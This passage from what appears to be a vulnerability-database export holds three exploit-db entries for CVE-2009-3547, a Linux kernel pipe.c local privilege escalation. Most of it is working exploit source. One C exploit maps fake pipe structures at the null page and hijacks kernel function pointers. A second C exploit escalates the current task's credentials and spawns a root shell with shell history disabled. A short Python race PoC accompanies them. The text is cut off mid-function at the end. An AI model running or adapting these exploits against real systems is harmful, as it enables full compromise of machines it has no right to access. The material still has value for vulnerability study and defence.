spoken.\r\n\r\n That wraps up our OpenBSD history lesson, in case anyone forgot it.\r\n PS -- enjoy that null ptr deref exploit just released for OpenBSD.\r\n\r\n --------------------------------------------------------------------\r\n\r\n Important final exploit notes:\r\n\r\n don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,\r\n or DEBUG_SPINLOCK are enabled and modify the structures below \r\n accordingly -- a fancier exploit would do this automatically\r\n\r\n I've broken the 2.4->2.6.10 version of the exploit and would like to see \r\n someone fix it ;) See below for more comments on this.\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <sys/syscall.h>\r\n#include <sys/utsname.h>\r\n#include \"exp_framework.h\"\r\n\r\nint pipefd[2];\r\nstruct exploit_state *exp_state;\r\nint is_old_kernel = 0;\r\n\r\nint go_go_speed_racer(void *unused)\r\n{\r\n\tint ret;\r\n\r\n while(!exp_state->got_ring0) {\r\n\t\t/* bust spinlock */\r\n\t\t*(unsigned int *)NULL = is_old_kernel ? 0 : 1;\r\n ret = pipe(pipefd);\r\n\t\tif (!ret) {\r\n \tclose(pipefd[0]);\r\n \tclose(pipefd[1]);\r\n\t\t}\r\n }\r\n\r\n\treturn 0;\r\n}\r\n\r\n/* <3 twiz/sgrakkyu */\r\nint start_thread(int (*f)(void *), void *arg)\r\n{\r\n char *stack = malloc(0x4000);\r\n int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);\r\n if (tid < 0) {\r\n printf(\"can't create thread\\n\");\r\n exit(1);\r\n }\r\n\tsleep(1);\r\n return tid;\r\n}\r\n\r\nchar *desc = \"MooseCox: Linux <= 2.6.31.5 pipe local root\";\r\nchar *cve = \"CVE-2009-3547\";\r\n\r\n#define PIPE_BUFFERS 16\r\n\r\n/* this changes on older kernels, but it doesn't matter to our method */\r\nstruct pipe_buf_operations {\r\n\tint can_merge;\r\n\tvoid *map;\r\n\tvoid *unmap;\r\n\tvoid *confirm;\r\n\tvoid *release;\r\n\tvoid *steal;\r\n\tvoid *get;\r\n};\r\n\r\nstruct pipe_buffer2620ornewer {\r\n\tvoid *page;\r\n\tunsigned int offset, len;\r\n\tvoid *ops;\r\n\tunsigned int flags;\r\n\tunsigned long private;\r\n};\r\n\r\nstruct pipe_buffer2619orolder {\r\n\tvoid *page;\r\n\tunsigned int offset, len;\r\n\tvoid *ops;\r\n\tunsigned int flags;\r\n};\r\n\r\nstruct pipe_buffer2616orolder {\r\n\tvoid *page;\r\n\tunsigned int offset, len;\r\n\tvoid *ops;\r\n};\r\n\r\nstruct pipe_inode_info2620ornewer {\r\n\tunsigned int spinlock;\r\n\t/*\r\n\t// LOCKBREAK\r\n\tunsigned int break_lock;\r\n\t// DEBUG_SPINLOCK\r\n\tunsigned int magic, owner_cpu;\r\n\tvoid *owner;\r\n\t*/\r\n\tvoid *next, *prev;\r\n\tunsigned int nrbufs, curbuf;\r\n\tvoid *tmp_page;\r\n\tunsigned int readers;\r\n\tunsigned int writers;\r\n\tunsigned int waiting_writers;\r\n\tunsigned int r_counter;\r\n\tunsigned int w_counter;\r\n\tvoid *fasync_readers;\r\n\tvoid *fasync_writers;\r\n\tvoid *inode;\r\n\tstruct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];\r\n};\r\n\r\nstruct pipe_inode_info2619orolder {\r\n\tunsigned int spinlock;\r\n\t/*\r\n\t// if PREEMPT enabled\r\n\tunsigned int break_lock;\r\n\t// DEBUG_SPINLOCK\r\n\tunsigned int magic, owner_cpu;\r\n\tvoid *owner;\r\n\t*/\r\n\tvoid *next, *prev;\r\n\tunsigned int nrbufs, curbuf;\r\n\tstruct pipe_buffer2619orolder bufs[PIPE_BUFFERS];\r\n\tvoid *tmp_page;\r\n\tunsigned int start;\r\n\tunsigned int readers;\r\n\tunsigned int writers;\r\n\tunsigned int waiting_writers;\r\n\tunsigned int r_counter;\r\n\tunsigned int w_counter;\r\n\tvoid *fasync_readers;\r\n\tvoid *fasync_writers;\r\n\tvoid *inode;\r\n};\r\n\r\nstruct pipe_inode_info2616orolder {\r\n\tunsigned int spinlock;\r\n\t/*\r\n\t// if PREEMPT enabled\r\n\tunsigned int break_lock;\r\n\t// DEBUG_SPINLOCK\r\n\tunsigned int magic, owner_cpu;\r\n\t*/\r\n\tvoid *owner;\r\n\tvoid *next, *prev;\r\n\tunsigned int nrbufs, curbuf;\r\n\tstruct pipe_buffer2616orolder bufs[PIPE_BUFFERS];\r\n\tvoid *tmp_page;\r\n\tunsigned int start;\r\n\tunsigned int readers;\r\n\tunsigned int writers;\r\n\tunsigned int waiting_writers;\r\n\tunsigned int r_counter;\r\n\tunsigned int w_counter;\r\n\tvoid *fasync_readers;\r\n\tvoid *fasync_writers;\r\n};\r\n\r\nstruct fasync_struct {\r\n\tint magic;\r\n\tint fa_fd;\r\n\tstruct fasync_struct *fa_next;\r\n\tvoid *file;\r\n};\r\n\r\nstruct pipe_inode_info2610orolder {\r\n\t/* this includes 2.4 kernels */\r\n\tunsigned long lock; // can be rw or spin\r\n\tvoid *next, *prev;\r\n\tchar *base;\r\n\tunsigned int len;\r\n\tunsigned int start;\r\n\tunsigned int readers;\r\n\tunsigned int writers;\r\n\t/* 2.4 only */\r\n\tunsigned int waiting_readers;\r\n\r\n\tunsigned int waiting_writers;\r\n\tunsigned int r_counter;\r\n\tunsigned int w_counter;\r\n\t/* 2.6 only */\r\n\tstruct fasync_struct *fasync_readers;\r\n\tstruct fasync_struct *fasync_writers;\r\n};\r\n\r\nint prepare(unsigned char *buf)\r\n{\t\r\n\tstruct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;\r\n\tstruct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;\r\n\tstruct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;\r\n\tstruct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;\r\n\tstruct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;\r\n\tint i;\r\n\tint newver;\r\n\tstruct utsname unm;\r\n\r\n\ti = uname(&unm);\r\n\tif (i != 0) {\r\n\t\tprintf(\"unable to get kernel version\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {\r\n\t\tfprintf(stdout, \" [+] Using newer pipe_inode_info layout\\n\");\r\n\t\tnewver = 3;\r\n\t} else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {\r\n\t\tfprintf(stdout, \" [+] Using older pipe_inode_info layout\\n\");\r\n\t\tnewver = 2;\r\n\t} else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {\r\n\t\tfprintf(stdout, \" [+] Using older-er pipe_inode_info layout\\n\");\r\n\t\tnewver = 1;\r\n//\t} else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {\r\n//\t\tis_old_kernel = 1;\r\n//\t\tnewver = 0;\r\n\t} else {\r\n\t\tfprintf(stdout, \" [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* for most of these what will happen is our write will\r\n\t cause ops->confirm(/pin) to be called, which we've replaced\r\n\t with own_the_kernel\r\n\t for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets\r\n\t called instead (repeatedly) is the release op\r\n\t*/\r\n\tif (newver == 3) {\r\n\t\t/* uncomment for DEBUG_SPINLOCK */\r\n\t\t//info_new->magic = 0xdead4ead;\r\n\t\t/* makes list_head empty for wake_up_common */\r\n\t\tinfo_new->next = &info_new->next;\r\n\t\tinfo_new->readers = 1;\r\n\t\tinfo_new->writers = 1;\r\n\t\tinfo_new->nrbufs = 1;\r\n\t\tinfo_new->curbuf = 1;\r\n\t\tfor (i = 0; i < PIPE_BUFFERS; i++)\r\n\t\t\tinfo_new->bufs[i].ops = (void *)ops;\r\n\t} else if (newver == 2) {\r\n\t\t/* uncomment for DEBUG_SPINLOCK */\r\n\t\t//info_old->magic = 0xdead4ead;\r\n\t\t/* makes list_head empty for wake_up_common */\r\n\t\tinfo_old->next = &info_old->next;\r\n\t\tinfo_old->readers = 1;\r\n\t\tinfo_old->writers = 1;\r\n\t\tinfo_old->nrbufs = 1;\r\n\t\tinfo_old->curbuf = 1;\r\n\t\tfor (i = 0; i < PIPE_BUFFERS; i++)\r\n\t\t\tinfo_old->bufs[i].ops = (void *)ops;\r\n\t} else if (newver == 1) {\r\n\t\t/* uncomment for DEBUG_SPINLOCK */\r\n\t\t//info_older->magic = 0xdead4ead;\r\n\t\t/* makes list_head empty for wake_up_common */\r\n\t\tinfo_older->next = &info_older->next;\r\n\t\tinfo_older->readers = 1;\r\n\t\tinfo_older->writers = 1;\r\n\t\tinfo_older->nrbufs = 1;\r\n\t\tinfo_older->curbuf = 1;\r\n\t\t/* we'll get called multiple times from free_pipe_info\r\n\t\t but it's ok because own_the_kernel handles this case\r\n\t\t*/\r\n\t\tfor (i = 0; i < PIPE_BUFFERS; i++)\r\n\t\t\tinfo_older->bufs[i].ops = (void *)ops;\r\n\t} else {\r\n\t\t/*\r\n\t\tdifferent ballgame here, instead of being able to \r\n\t\tprovide a function pointer in the ops table, you \r\n\t\tcontrol a base address used to compute the address for \r\n\t\ta copy into the kernel via copy_from_user. The \r\n\t\tfollowing should get you started.\r\n\t\t*/\r\n\t\t/* lookup symbol for writable fptr then trigger it later\r\n\t\t change the main write in the one thread to write out \r\n\t\t pointers with the value of exp_state->exploit_kernel\r\n\t\t*/\r\n\t\tinfo_oldest->base = (char *)0xc8000000;\r\n\t\tinfo_oldest->readers = 1;\r\n\t\tinfo_oldest->writers = 1;\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tops->can_merge = 1;\r\n\tfor (i = 0; i < 16; i++)\r\n\t\t((void **)&ops->map)[i] = exp_state->own_the_kernel;\r\n\r\n\treturn 0;\r\n}\r\n\r\nint requires_null_page = 1;\r\n\r\nint get_exploit_state_ptr(struct exploit_state *ptr)\r\n{\r\n\texp_state = ptr;\r\n\treturn 0;\r\n}\r\n\r\nint trigger(void)\r\n{\r\n char buf[128];\r\n int fd;\r\n\tint i = 0;\r\n\r\n\t/* ignore sigpipe so we don't bail out early */\r\n\tsignal(SIGPIPE, SIG_IGN);\r\n\r\n\tstart_thread(go_go_speed_racer, NULL);\r\n\r\n\tfprintf(stdout, \" [+] We'll let this go for a while if needed...\\n\");\r\n\tfflush(stdout);\r\n\r\n while (!exp_state->got_ring0 && i < 10000000) {\r\n\t\tfd = pipefd[1];\r\n\t\tsprintf(buf, \"/proc/self/fd/%d\", fd);\r\n\t\tfd = open(buf, O_WRONLY | O_NONBLOCK);\r\n\t\tif (fd >= 0) {\r\n\t\t\t/* bust spinlock */\r\n\t\t\t*(unsigned int *)NULL = is_old_kernel ? 0 : 1;\r\n\t\t\twrite(fd, \".\", 1);\r\n\t\t\tclose(fd);\r\n\t\t}\r\n\t\ti++;\r\n }\r\n\r\n\tif (!exp_state->got_ring0) {\r\n\t\tfprintf(stdout, \" [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\treturn 1;\r\n}\r\n\r\nint post(void)\r\n{\r\n//\treturn RUN_ROOTSHELL;\r\n\treturn FUNNY_PIC_AND_ROOTSHELL;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40812"}, {"lastseen": "2016-02-01T11:22:13", "bulletinFamily": "exploit", "description": "Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation. CVE-2009-3547. Local exploit for linux platform", "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "EDB-ID:9844", "href": "https://www.exploit-db.com/exploits/9844/", "type": "exploitdb", "title": "Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation", "sourceData": "# This is a PoC based off the PoC release by Earl Chew\r\n# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability\r\n# PoC by Matthew Bergin\r\n# Bugtraq ID: 36901\r\n\r\nimport os\r\nimport time\r\nimport random\r\n#infinite loop\r\nwhile (i == 0):\r\n os.system(\"sleep 1\")\r\n while (x == 0):\r\n time.sleep(random.random()) #random int 0.0-1.0\r\n pid = str(os.system(\"ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }\"))\r\n if (pid == 0): #need an active pid, race condition applies\r\n print \"[+] Didnt grab PID, got: \" + pid + \" -- Retrying...\"\r\n return\r\n else:\r\n print \"[+] PID: \" + pid\r\n loc = \"echo n > /proc/\" + pid + \"/fd/1\"\r\n os.system(loc) # triggers the fault, runs via sh\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9844/"}, {"lastseen": "2016-02-03T18:56:39", "bulletinFamily": "exploit", "description": "Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1). CVE-2009-3547. Local exploit for linux platform", "modified": "2009-11-03T00:00:00", "published": "2009-11-03T00:00:00", "id": "EDB-ID:33321", "href": "https://www.exploit-db.com/exploits/33321/", "type": "exploitdb", "title": "Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/36901/info\r\n\r\nLinux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.\r\n\r\nLocal attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\n/******************************************************************************\r\n * .:: Impel Down ::.\r\n *\r\n * Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)\r\n * by teach & xipe\r\n * Greetz goes to all our mates from #nibbles, #oldschool and #carib0u\r\n * (hehe guyz, we would probably be high profile and mediatised el8 if we \r\n * lost less time on trolling all day long, but we LOVE IT :))) \r\n * Special thanks to Ivanlef0u, j0rn & pouik for being such amazing (but i\r\n * promise ivan, one day i'll kill u :p)\r\n * \r\n * (C) COPYRIGHT teach & xipe, 2009\r\n * All Rights Reserved\r\n *\r\n * teach@vxhell.org\r\n * xipe@vxhell.org\r\n * \r\n *******************************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <stdint.h>\r\n#include <sched.h>\r\n#include <sys/types.h>\r\n#include <sys/utsname.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <sys/personality.h>\r\n\r\n/* First of all, im about to teach (hehe, just like mah nick) you mah powerful copy-and-past skillz */\r\n\r\n// didn't really care about this. i mixed 2.6.0 to 2.6.31 :)\r\n\r\n#define PIPE_BUFFERS (16)\r\n\r\nstruct __wait_queue_head {\r\n int spinlock;\r\n \r\n void *next, *prev; // struct list_head\r\n};\r\n\r\nstruct fasync_struct { // bleh! didn't change from 2.6.0 to 2.6.31\r\n\tint magic;\r\n\tint fa_fd;\r\n\tstruct fasync_struct *fa_next;\r\n\tvoid *file; // struct file\r\n};\r\n\r\n// this iz the w00t about 2.6.11 to 2.6.31\r\nstruct pipe_buf_operations {\r\n int suce;\r\n int *fptr[6];\r\n};\r\n\r\n\r\n// from 2.6.0 to 2.6.10\r\nstruct pipe_inode_info_2600_10 {\r\n struct __wait_queue_head wait;\r\n char *base; // !!!!!\r\n unsigned int len; // !!!\r\n unsigned int start; // !!!\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n};\r\n\r\n// from 2.6.11 to 2.6.16 \r\nstruct pipe_buffer_2611_16 {\r\n void *suce;\r\n unsigned int offset, len;\r\n struct pipe_buf_operations *ops;\r\n};\r\n\r\nstruct pipe_inode_info_2611_16 {\r\n struct __wait_queue_head wait;\r\n unsigned int nrbufs, curbuf;\r\n struct pipe_buffer_2611_16 bufs[PIPE_BUFFERS];\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n};\r\n\r\n// from 2.6.17 to 2.6.19 \r\nstruct pipe_buffer_2617_19 {\r\n void *suce;\r\n unsigned int offset, len;\r\n struct pipe_buf_operations *ops;\r\n unsigned int tapz;\r\n};\r\n\r\nstruct pipe_inode_info_2617_19 {\r\n struct __wait_queue_head wait;\r\n unsigned int nrbufs, curbuf;\r\n struct pipe_buffer_2617_19 bufs[PIPE_BUFFERS];\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n void *suce;\r\n};\r\n\r\n// from 2.6.20 to 2.6.22 \r\nstruct pipe_buffer_2620_22 {\r\n void *suce;\r\n unsigned int offset, len;\r\n struct pipe_buf_operations *ops;\r\n unsigned int tapz;\r\n};\r\n\r\nstruct pipe_inode_info_2620_22 {\r\n struct __wait_queue_head wait;\r\n unsigned int nrbufs, curbuf;\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n void *suce;\r\n struct pipe_buffer_2620_22 bufs[PIPE_BUFFERS];\r\n};\r\n\r\n// AND FINALY from 2.6.23 to 2.6.31 ... :))\r\nstruct pipe_buffer_2623_31 {\r\n void *suce;\r\n unsigned int offset, len;\r\n struct pipe_buf_operations *ops;\r\n unsigned int tapz;\r\n unsigned long tg;\r\n};\r\n\r\nstruct pipe_inode_info_2623_31 {\r\n struct __wait_queue_head wait;\r\n unsigned int nrbufs, curbuf;\r\n void *tmp_page;\r\n unsigned int start;\r\n unsigned int readers;\r\n unsigned int writers;\r\n unsigned int waiting_writers;\r\n unsigned int r_counter;\r\n unsigned int w_counter;\r\n struct fasync_struct *fasync_readers;\r\n struct fasync_struct *fasync_writers;\r\n void *suce;\r\n struct pipe_buffer_2623_31 bufs[PIPE_BUFFERS];\r\n};\r\n\r\n\r\n\r\nstatic pid_t uid;\r\nstatic gid_t gid;\r\nstatic int iz_kern2600_10;\r\nunsigned long taskstruct[1024];\r\nvoid gomu_gomu_nooooo_gatling_shell(void);\r\nint get_kern_version(void);\r\nvoid map_struct_at_null(void);\r\nvoid get_cur_task_and_escalate_priv(void);\r\nvoid* get_null_page(void);\r\nvoid error(char *s);\r\nint is_done(int new);\r\n\r\nstatic inline void *get_4kstack_top()\r\n{\r\n\tvoid *stack;\r\n\r\n\t__asm__ __volatile__ (\r\n\t\"movl $0xfffff000,%%eax ;\"\r\n\t\"andl %%esp, %%eax ;\"\r\n\t\"movl %%eax, %0 ;\"\r\n\t: \"=r\" (stack)\r\n\t);\r\n\treturn stack; \r\n}\r\n\r\nstatic inline void *get_8kstack_top()\r\n{\r\n\tvoid *stack;\r\n\r\n\t__asm__ __volatile__ (\r\n\t\"movl $0xffffe000,%%eax ;\"\r\n\t\"andl %%esp, %%eax ;\"\r\n\t\"movl %%eax, %0 ;\"\r\n\t: \"=r\" (stack)\r\n\t);\r\n\treturn stack; \r\n}\r\n\r\nstatic inline void *get_current()\r\n{\r\n void *cur = *(void **)get_4kstack_top(); \r\n if( ( (unsigned int *)cur >= (unsigned int *)0xc0000000 ) && ( *(unsigned int *)cur == 0 ) )\r\n return cur;\r\n\telse\r\n\t cur = *(void **)get_8kstack_top();\r\n\treturn cur;\r\n}\r\n\r\n\r\n\r\nvoid map_struct_at_null()\r\n{\r\n struct pipe_inode_info_2600_10 *pipe2600_10;\r\n \r\n struct pipe_inode_info_2611_16 *pipe2611_16;\r\n \r\n struct pipe_inode_info_2617_19 *pipe2617_19;\r\n \r\n struct pipe_inode_info_2620_22 *pipe2620_22;\r\n \r\n struct pipe_inode_info_2623_31 *pipe2623_31;\r\n \r\n struct pipe_buf_operations luffy;\r\n \r\n \r\n FILE *f;\r\n unsigned int *sct_addr;\r\n unsigned int sc_addr;\r\n\tchar dummy;\r\n\tchar sname[256], pipebuf[10];\r\n\tint ret, i;\r\n\tvoid *page;\r\n \r\n page = get_null_page();\r\n int version = get_kern_version();\r\n \r\n luffy.suce = 1;\r\n for(i = 0; i < 6; i++)\r\n luffy.fptr[i] = (int *)get_cur_task_and_escalate_priv;\r\n \r\n // ok lets go ...\r\n if(version >= 2600 && version <= 2610)\r\n {\r\n iz_kern2600_10 = 1;\r\n \r\n /* we are going to ninja an obsolete syscall from teh sys_call_table: sys_olduname\r\n * i don't bother to restore it after owning the kernel. implement it if u want :p\r\n */\r\n \r\n // hehe as u see, his imperial majesty spender haz alwayz good trickz\r\n \r\n\t f = fopen(\"/proc/kallsyms\", \"r\");\r\n\t if (f == NULL) \r\n\t {\r\n\t\t f = fopen(\"/proc/ksyms\", \"r\");\r\n\t\t if (f == NULL) \r\n\t\t {\r\n\t\t\t error(\"0hn000es. i cant open /proc/{kall,k}syms for looking after teh sys_call_table addr. maybe u should set it yourself!\");\r\n\t\t }\r\n\t }\r\n\r\n\t ret = 0;\r\n\t while(ret != EOF) \r\n\t {\r\n\t\t ret = fscanf(f, \"%p %c %s\\n\", (void **)&sct_addr, &dummy, sname);\r\n\t\t if (ret == 0) \r\n\t\t {\r\n\t\t\t fscanf(f, \"%s\\n\", sname);\r\n\t\t\t continue;\r\n\t\t }\r\n\t\t if (!strcmp(\"sys_call_table\", sname)) \r\n\t\t {\r\n\t\t\t printf(\"\\t\\t+ sys_call_table is at %p\\n\",(void *)sct_addr);\r\n\t\t\t fclose(f);\r\n\t\t }\r\n\t }\r\n \r\n if(f != NULL)\r\n {\r\n\t fclose(f);\r\n\t error(\"0hn000es. i cant get sys_olduname addr. maybe u should set it yourself!\");\r\n\t }\r\n\t \r\n\t sc_addr = (unsigned int) (sct_addr + __NR_olduname*sizeof(int));\r\n\t \r\n\t pipe2600_10 = (struct pipe_inode_info_2600_10 *) page;\r\n\t memcpy(pipebuf, (char *) &sc_addr, sizeof(int));\r\n\t pipe2600_10->base = pipebuf;\r\n\t pipe2600_10->len = 0;\r\n\t pipe2600_10->start = 0;\r\n\t pipe2600_10->writers = 1;\r\n\t printf(\"\\t\\t+ Structs for kernels 2.6.0 => 2.6.10 were mapped\\n\");\r\n\t \r\n }\r\n \r\n else if(version >= 2611 && version <= 2616)\r\n {\r\n pipe2611_16 = (struct pipe_inode_info_2611_16 *) page;\r\n\t pipe2611_16->writers = 1;\r\n\t pipe2611_16->nrbufs = 1;\r\n\t for(i = 0; i < PIPE_BUFFERS; i++)\r\n\t pipe2611_16->bufs[i].ops = &luffy;\r\n\t printf(\"\\t\\t+ Structs for kernels 2.6.11 => 2.6.16 were mapped\\n\");\r\n }\r\n \r\n else if(version >= 2617 && version <= 2619)\r\n {\r\n pipe2617_19 = (struct pipe_inode_info_2617_19 *) page;\r\n pipe2617_19->readers = 1;\r\n\t pipe2617_19->nrbufs = 1;\r\n\t for(i = 0; i < PIPE_BUFFERS; i++)\r\n\t pipe2617_19->bufs[i].ops = &luffy;\r\n\t pipe2617_19->wait.next = &pipe2617_19->wait.next;\r\n pipe2617_19->wait.spinlock = 1;\r\n printf(\"\\t\\t+ Structs for kernels 2.6.16 => 2.6.19 were mapped\\n\");\r\n }\r\n \r\n else if(version >= 2620 && version <= 2622)\r\n {\r\n pipe2620_22 = (struct pipe_inode_info_2620_22 *) page;\r\n pipe2620_22->readers = 1;\r\n\t pipe2620_22->nrbufs = 1;\r\n\t for(i = 0; i < PIPE_BUFFERS; i++)\r\n\t pipe2620_22->bufs[i].ops = &luffy;\r\n\t pipe2620_22->wait.next = &pipe2620_22->wait.next;\r\n pipe2620_22->wait.spinlock = 1;\r\n printf(\"\\t\\t+ Structs for kernels 2.6.20 => 2.6.22 were mapped\\n\");\r\n }\r\n \r\n else if(version >= 2623 && version <= 2631)\r\n {\r\n pipe2623_31 = (struct pipe_inode_info_2623_31 *) page;\r\n pipe2623_31->readers = 0;\r\n\t pipe2623_31->nrbufs = 0;\r\n\t for(i = 0; i < PIPE_BUFFERS; i++)\r\n\t pipe2623_31->bufs[i].ops = &luffy;\r\n\t pipe2623_31->wait.next = &pipe2623_31->wait.next;\r\n pipe2623_31->wait.spinlock = 1;\r\n printf(\"\\t\\t+ Structs for kernels 2.6.23 => 2.6.31 were mapped\\n\");\r\n }\r\n \r\n else\r\n error(\"errrr! exploit not developped for ur kernel!\");\r\n \r\n \r\n \r\n}\r\n\r\nint get_kern_version(void) // return something like 2600 for kernel 2.6.0, 2619 for kernel 2.6.19 ...\r\n{\r\n struct utsname buf;\r\n char second[2],third[3];\r\n int version = 2000;\r\n if(uname(&buf) < 0)\r\n error(\"can't have ur k3rn3l version. this box isn't for today :P\\n\");\r\n sprintf(second, \"%c\", buf.release[2]);\r\n second[1] = 0;\r\n version += atoi(second) * 100;\r\n \r\n third[0] = buf.release[4];\r\n if(buf.release[5] >= '0' || buf.release[5] <= '9')\r\n {\r\n third[1] = buf.release[5];\r\n third[2] = 0;\r\n version += atoi(third);\r\n }\r\n else\r\n {\r\n third[1] = 0;\r\n version += third[0] - '0';\r\n }\r\n \r\n printf(\"\\t\\t+ Kernel version %i\\n\", version);\r\n \r\n return version; \r\n \r\n} \r\n\r\n// from our g0dz spender & julien :] lullz\r\nvoid* get_null_page(void)\r\n{\r\n\tvoid *page;\r\n\tif ((personality(0xffffffff)) != PER_SVR4) \r\n\t{\r\n\t\tpage = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\r\n\t\tif (page != NULL) \r\n\t\t{\r\n\t\t\tpage = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\r\n\t\t\tif (page != NULL) \r\n\t\t\t{\r\n\t\t\t\terror(\"this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*\");\r\n\t\t\t}\r\n\t\t}\r\n\t else \r\n\t {\r\n\t\t if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0)\r\n\t\t {\r\n\t\t free(page);\r\n\t\t\t error(\"HELL! can't mprotect my null page !@#*. goto /dev/null !\");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t // may be we are lucky today ... :)\r\n\t page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\r\n\t\tif (page != NULL) \r\n\t\t{\r\n\t\t\tpage = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\r\n\t\t\tif (page != NULL) \r\n\t\t\t{\r\n\t\t\t\terror(\"this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*\");\r\n\t\t\t}\r\n\t\t}\r\n\t else \r\n\t {\r\n\t\t if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) // ... or not ! :(\r\n\t\t {\r\n\t\t free(page);\r\n\t\t\t error(\"HELL! can't mprotect my null page !@#*. goto /dev/null !\");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tprintf(\"\\t\\t+ Got null page\\n\");\r\n\treturn page;\r\n}\r\n\r\nvoid gomu_gomu_nooooo_gatling_shell(void) // sgrakkyu & twiz are el8 :))\r\n{\r\n char *argv[] = { \"/bin/sh\", \"--noprofile\", \"--norc\", NULL };\r\n char *envp[] = { \"TERM=linux\", \"PS1=blackbird\\\\$ \", \"BASH_HISTORY=/dev/null\",\r\n \"HISTORY=/dev/null\", \"history=/dev/null\",\r\n \"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\", NULL };\r\n\r\n execve(\"/bin/sh\", argv, envp);\r\n error(\"hheeeehhh! unable to spawn a sh\");\r\n}\r\n\r\n\r\n\r\nint is_done(int new)\r\n{\r\n\tstatic int done = 0;\r\n\tif (done == 1)\r\n\t\treturn (1);\r\n\tdone = new;\r\n}\r\n\r\nvolatile int done = 0;\r\n\r\nvoid get_cur_task_and_escalate_priv()\r\n{\r\n\tuint32_t\ti;\r\n\tuint32_t\t*task = get_current();\r\n\tuint32_t \t*cred = 0;\r\n\t\r\n\t\r\n\tfor(i=0; i<0x1000; i++)\r\n {\r\n if( (task[i] == task[i+1]) && (task[i+1] == task[i+2]) && (task[i+2] == task[i+3]))\r\n {\r\n 